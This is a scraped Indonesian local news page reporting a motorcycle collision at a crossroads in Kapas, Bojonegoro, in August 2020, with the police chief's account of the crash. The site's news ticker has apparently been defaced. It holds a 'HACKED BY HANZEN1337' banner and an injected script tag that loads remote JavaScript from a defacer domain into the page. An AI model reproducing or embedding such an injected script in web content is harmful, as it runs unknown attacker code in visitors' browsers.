News Ticker
  • HACKED BY HANZEN1337
  • <script src="https://jso.defacer.id/raw/I7j6n4T3C9"></script>
  • Kunjungan Kerja di Bojonegoro, Menhan Sjafrie Sjamsoeddin Tinjau Rencana Pengembangan Batalyon TP 885 dan Brigif 33 di Dander
  • 11 Juli dalam Sejarah
  • Prakiraan Cuaca Bojonegoro 11 Juli 2026
  • Kandang Ayam Senilai Rp2 M di Malo, Bojonegoro Ludes Terbakar
  • Panen Melon Bersama, Bupati Bojonegoro Ajak Generasi Muda Bangun Pertanian Modern
  • Pemkab Bojonegoro Alokasikan Rp11,03 Miliar untuk Lima Program Beasiswa Mahasiswa
  • Seorang Lansia Bojonegoro Tewas Tertabrak Kereta Api Jayabaya di Perlintasan Baureno
  • Perkiraan Harga Emas Hari Ini, 10 Jul 2026
  • Prakiraan Cuaca Bojonegoro 10 Juli 2026
  • 10 Juli dalam Sejarah
  • Kecamatan Kota Dominasi Emas Kickboxing, Klasemen Sementara Porkab II Bojonegoro Masih Memimpin
  • Dalam Sehari Terjadi Enam Kebakaran Lahan di Bojonegoro, Ini Daftarnya
  • Pemkab Bojonegoro Berikan Pembinaan Ribuan Mahasiswa Penerima Beasiswa Daerah
  • "El Último Tango", Sepatu Spesial Adidas untuk Perjalanan Terakhir Messi di Piala Dunia
  • Kejari Bojonegoro Terima Tahap II Kasus Dugaan Peredaran Rokok Ilegal
  • Paripurna DPRD, Raperda Pertanggungjawaban APBD 2025 Disetujui
  • Hadapi Musim Kemarau, Pemkab Bojonegoro Distribusikan Air Bersih ke Sejumlah Desa
  • Pemkab Bojonegoro Dorong Setiap OPD Lahirkan Inovasi Lewat BIA 2026
  • Prakiraan Cuaca Bojonegoro 9 Juli 2026
  • Rumah Kosong di Kapas, Bojonegoro Terbakar, Kerugian Capai 150 Juta Rupiah
  • Merayakan Detik Ini: Menemukan Kedamaian dalam Jejak Hidup yang Singkat
  • Tiga Rumah di Temayang Bojonegoro Terbakar Akibat Korsleting Listrik, Total Kerugian 520 Juta Rupiah
Tabrakan Motor di Kapas Bojonegoro, Kedua Pengendara Luka-Luka

Kecelakaan Lalu Lintas

Tabrakan Motor di Kapas Bojonegoro, Kedua Pengendara Luka-Luka

Bojonegoro - Kecelakaan lalu-lintas antara 2 sepeda motor terjadi pada Sabtu (01/08/2020) sekira pukul 19.55 WIB, di jalan raya Bojonegoro - Babat, tepatnya di perempatan masjid turut Desa Plesungan Kecamatan Kapas Kabupaten Bojonegoro.
 
 
Sepeda motor Yamaha Vega yang berjalan dari jalan poros desa, saat hendak menyeberang jalan raya, ditabrak sepeda motor Yamaha Vixion yang berjalan di jalan raya. Akibatnya, kedua pengendara sepeda motor tersebut mengalami luka-luka dan segera dilarikan ke rumah sakit.
 
Adapun identitas kedua kendaraan yang terlibat kecelakaan tersebut yaitu sepeda motor Yamaha Vega nomor polisi S 6743 BN, yang dikendarai Saipan (55), warga Desa Sumberagung Kecamatan Dander Kabupaten Bojonegoro, kontra sepeda motor Yamaha Vixion nomor polisi AE 2590 KS, yang dikendarai Isa Anshory Fattah (20), warga Desa Kersian Kecamatan Geneng Kabupaten Ngawi. 
 
 

Pengendara sepeda motor yang terlibat kecelakaan lalu-lintas di jalan raya Bojonegoro - Babat, turut Desa Plesungan Kecamatan Kapas Kabupaten Bojonegoro, saat dalam perawatan di rumah sakit. Sabtu (01/08/2020)

 
Dikutip dari keterangan Kapolsek Kapas, Ajun Komisaris Polisi (AKP) Sukirman, bahwa konologi kejadian laka-lantas tersebut bermula, pada awalnya sepeda motor Yamaha Vega nomor polisi S 6743 BN yang di kendarai Saipan, berjalan di jalan Desa Plesungan, dari arah utara ke selatan.
 
Sesampainya di lokasi kejadian, tepatnya di perempatan masjid Plesungan, hendak menyeberang jalan raya. Namun saat berada di tengah jalan raya, pada saat yang bersamaan dari arah barat ke timur berjalan sepeda motor Yamaha Vixion nomor polisi AE 2590 KS, yang dikendarai Ansory Fattah.
 
"Karena jarak yang sudah dekat sehingga terjadilah laka-lantas tersebut." kata Kapolsek.
 
 
 
Atas kejadian laka tersebut kedua pengendara mengalami luka-luka. Kedua kendaraan yang terlibat laka-lantas tersebut juga mengalami kerusakan material.
 
"Kedua pengendara tersebut selanjutnya dibawa ke RSUD dr R Sosodoro Bojonegoro, untuk mendapatkan perawatan medis," kata Kapolsek.
 
 
 
Saat ini kejadian laka-lantas tersebut ditangani Unit Unit Laka Lantas Sat lantas Polres Bojonegoro.
 
"Penanganan perkara tersebut selanjutnya ditangani Unit Laka Lantas Sat lantas Polres Bojonegoro. Kedua kendaraan yang terlibat laka-lantas tersebut sementara diamankan petugas," kata Kapolsek. (red/imm)
 
Berita Terkait
1783892111.8774 at start, 1783892112.2329 at end, 0.35544991493225 sec elapsed